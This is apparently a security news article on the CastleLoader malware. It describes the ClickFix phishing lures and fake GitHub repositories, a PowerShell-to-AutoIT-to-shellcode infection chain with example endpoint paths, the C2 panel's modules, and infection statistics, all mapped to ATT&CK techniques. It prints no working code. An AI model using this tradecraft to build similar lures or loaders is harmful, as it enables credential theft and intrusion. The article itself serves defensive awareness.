A newly identified loader malware dubbed CastleLoader has emerged as a significant threat since early 2025, rapidly evolving into a distribution platform for various information stealers and remote access trojans (RATs).
Leveraging sophisticated phishing tactics under T1566 and drive-by compromise methods classified as T1189, attackers masquerade as legitimate software libraries, online meeting platforms like Google Meet, browser update notifications, or document verification systems through T1036 techniques.
This social engineering ploy tricks victims into executing malicious PowerShell commands (T1059.001) via clipboard manipulation, effectively bypassing traditional security defenses by exploiting user trust.
Over a two-month period starting in May 2025, threat actors deployed CastleLoader across seven distinct command-and-control (C2) servers, recording 1,634 download attempts that resulted in 469 successful infections a 28.7% conversion rate highlighting the campaign’s efficacy.
Notably, these operations have compromised over 400 critical victims, including U.S. government entities, demonstrating CastleLoader’s targeted reach and potential for widespread damage.
Technical Breakdown of Infection Chain
In the primary distribution vector, CastleLoader employs Cloudflare-themed Clickfix phishing sites that display fake error messages or CAPTCHA prompts, prompting users to copy and paste PowerShell scripts into the Windows Run dialog (T1204.004).
According to Catalyst Report, this action triggers a background request to a malicious PHP endpoint, such as /s.php?an=0, which populates the clipboard with obfuscated code.
Upon execution, the script downloads a ZIP archive from a secondary endpoint like /s.php?an=2, extracts it using System.IO.Compression.FileSystem, and runs an AutoIT script (T1059.010) that loads shellcode into memory.
This shellcode resolves hashed DLLs and APIs before establishing C2 communications over web protocols (T1071.001) to fetch additional payloads via T1105 ingress tool transfer.
Depending on the campaign, victims receive secondary malware including StealC, RedLine, NetSupport RAT, DeerStealer, HijackLoader, or SectopRAT, each tailored for credential harvesting, backdoor access, or further loader chaining.
An alternative method involves fake GitHub repositories mimicking tools like SQL Server Management Studio, where malicious executables (T1204.002) directly connect to C2 servers for payload delivery.
Overlaps with DeerStealer campaigns, such as shared HijackLoader samples (e.g., hash aafcf3fc0eb947759e1c97917a6533a4), suggest coordinated efforts among threat actors, enhancing resilience through distributed domains and encrypted Docker containers.
C2 Infrastructure
CastleLoader’s C2 panel, version 1.1 Alpha, operates as a web-based management interface with MaaS-like features, including modules for statistics, visits, installs, delivery, tasks, and campaigns.
The installs section collects victim telemetry (T1005) such as IP addresses, user agents, and system details, enabling operators to monitor infections and trigger payload re-execution.
Delivery and tasks modules manage payload uploads, geographic targeting, and execution parameters like anti-VM detection and privilege escalation, while visits tracking analyzes user environments for refined attacks.
Despite its sophistication, CastleLoader has not appeared in underground forum sales, indicating possible in-house development.
This malware’s versatility in deploying stealers for data exfiltration and RATs for persistent access underscores its role in multifaceted cybercriminal operations, with network communications spanning legitimate services to evade attribution.
As of July 2025, the high infection rate and focus on high-value targets emphasize the need for enhanced user awareness training, clipboard monitoring, and behavioral analytics to counter such human-centric threats.
Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now
